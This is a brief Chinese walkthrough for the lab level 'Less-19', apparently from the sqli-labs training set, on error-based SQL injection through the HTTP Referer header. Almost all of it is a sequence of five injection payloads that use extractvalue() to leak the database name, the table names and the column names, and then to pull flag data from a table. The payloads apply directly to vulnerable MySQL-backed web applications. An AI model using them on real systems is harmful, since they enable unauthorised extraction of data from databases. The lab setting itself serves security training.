Less-19

Less-19 POST - Header Injection - Referer field - Error based (基于头部的Referer POST报错注入)

1.判断是否存在注入

Referer：'

2.查看所在数据库和数据库版本

Referer：' and extractvalue(1,concat(0x7e,database(),0x7e)) and '

3.查看数据库的表

Referer：' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e)) and '

4.查看9J7dKBsE表中的列

Referer：' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='9J7dKBsE' limit 1,1),0x7e)) and '

5.查看表中的flag列中的数据

Referer：' and extractvalue(1,concat(0x7e,right((select flag from 9J7dKBsE limit 3,1),31),0x7e)) and '